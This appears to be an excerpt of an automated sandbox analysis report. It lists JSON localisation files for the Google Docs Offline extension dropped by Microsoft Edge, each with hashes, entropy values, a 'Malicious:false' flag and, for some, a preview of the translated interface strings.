                                                                                                                                                                                                                                                                                                        Size (bytes):899
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                        MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                        SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                        SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                        SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2230
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                        MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                        SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                        SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                        SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1160
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                        MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                        SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                        SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                        SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3264
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                                        MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                                        SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                                        SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                                        SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3235
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                                        MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                                        SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                                        SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                                                        SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3122
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                                                        MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                                                        SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                                                        SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                                                        SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1895
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                                                        MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                                                        SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                                                        SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                                                        SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1042
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                                                        MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                                                        SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                                                        SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                                                        SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2535
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                        MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                        SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                        SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                        SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1028
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                        MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                        SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                        SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                        SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):994
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                        MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                        SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                        SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                        SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2091
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                        MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                        SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                        SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                        SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2778
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                        MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                        SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                        SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                        SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1719
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                        MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                        SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                        SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                        SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):936
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                        MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                        SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                        SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                        SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):3830
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                        MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                        SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                        SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                        SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1898
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                        MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                        SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                        SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                        SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):914
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                        MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                        SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                        SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                        SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):851
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                        MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                        SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                        SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                        SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):878
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                        MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                        SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                        SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                        SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                        Malicious:false
